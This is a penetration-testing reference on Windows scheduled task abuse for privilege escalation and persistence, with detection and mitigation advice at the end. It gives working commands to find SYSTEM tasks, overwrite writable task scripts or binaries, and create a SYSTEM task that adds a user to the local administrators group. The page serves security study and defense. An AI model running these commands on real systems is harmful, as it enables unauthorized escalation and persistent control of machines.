Scheduled Task Abuse
Overview
Windows Task Scheduler runs programs at defined intervals or in response to events. Scheduled tasks that run as SYSTEM or another privileged account and reference writable scripts or binaries allow privilege escalation. The attack is similar to Linux cron exploitation — if you can modify what a privileged task executes, your code runs with elevated privileges.
ATT&CK Mapping
- Tactic: TA0004 - Privilege Escalation
- Tactic: TA0003 - Persistence
- Technique: T1053.005 - Scheduled Task/Job: Scheduled Task
Prerequisites
- Shell access on the target system
- Scheduled tasks running as a privileged user (SYSTEM, Administrator)
- Write access to the binary, script, or directory referenced by the task
Techniques
Discovery
:: List all scheduled tasks with details
schtasks /query /fo LIST /v
:: Filter for tasks running as SYSTEM
schtasks /query /fo LIST /v | findstr /i "TaskName Run.As Task.To.Run"
:: List tasks in a specific folder
schtasks /query /fo LIST /v /tn "\Microsoft\Windows\*"
# PowerShell
Get-ScheduledTask | Where-Object {$_.State -eq 'Ready'} | Select-Object TaskName, TaskPath
Get-ScheduledTask | ForEach-Object { $_ | Get-ScheduledTaskInfo } | Select-Object TaskName, LastRunTime, NextRunTime
# Tasks running as SYSTEM
Get-ScheduledTask | ForEach-Object {
$principal = $_.Principal
if ($principal.UserId -like "*SYSTEM*" -or $principal.UserId -like "*S-1-5-18*") {
[PSCustomObject]@{
TaskName = $_.TaskName
Actions = ($_.Actions | ForEach-Object { $_.Execute })
RunAs = $principal.UserId
}
}
}
Writable Task Binaries
If a scheduled task points to a binary or script you can modify:
:: Check permissions on the task's executable
icacls "C:\Path\To\scheduled_script.bat"
icacls "C:\Path\To\scheduled_binary.exe"
:: If writable, inject payload
echo net localgroup administrators <user> /add >> "C:\Path\To\scheduled_script.bat"
:: Or replace the binary entirely
move "C:\Path\To\scheduled_binary.exe" "C:\Path\To\scheduled_binary.exe.bak"
copy payload.exe "C:\Path\To\scheduled_binary.exe"
Writable Task Directory
If the directory containing the task binary is writable, DLL hijacking may be possible:
:: Check directory permissions
icacls "C:\Path\To\"
:: If writable, check DLL search order for the scheduled binary
:: Place a malicious DLL that the binary will load
:: For .bat or .ps1 scripts, check if the script calls commands without full paths
type "C:\Path\To\scheduled_script.bat"
:: If the script calls "backup.exe" without a full path, place your binary first in PATH
Task Modification (Requires Admin)
If you have local admin but need SYSTEM:
:: Create a scheduled task running as SYSTEM
schtasks /create /tn "Escalate" /tr "cmd /c net localgroup administrators <user> /add" /sc once /st 00:00 /ru SYSTEM
schtasks /run /tn "Escalate"
schtasks /delete /tn "Escalate" /f
# PowerShell — create task as SYSTEM
$action = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c net localgroup administrators <user> /add"
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1)
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
Register-ScheduledTask -TaskName "Escalate" -Action $action -Trigger $trigger -Principal $principal
Start-ScheduledTask -TaskName "Escalate"
Unregister-ScheduledTask -TaskName "Escalate" -Confirm:$false
Detection Methods
Network-Based Detection
- Not directly observable on the network
Host-Based Detection
- Monitor scheduled task creation and modification (Event ID 4698 — task created, 4702 — task updated)
- Alert on tasks created with SYSTEM privileges by non-admin processes
- Monitor file modifications in directories referenced by scheduled tasks
- Alert on
schtasks /createorRegister-ScheduledTaskin command-line logging
Mitigation Strategies
- Restrict file permissions — scripts and binaries executed by scheduled tasks should be writable only by Administrators
- Use full paths in scripts — avoid relative paths in scheduled task scripts
- Audit scheduled tasks — regularly review tasks running as SYSTEM for necessity
- Restrict task creation — limit who can create scheduled tasks via Group Policy
- Monitor task changes — enable auditing for scheduled task events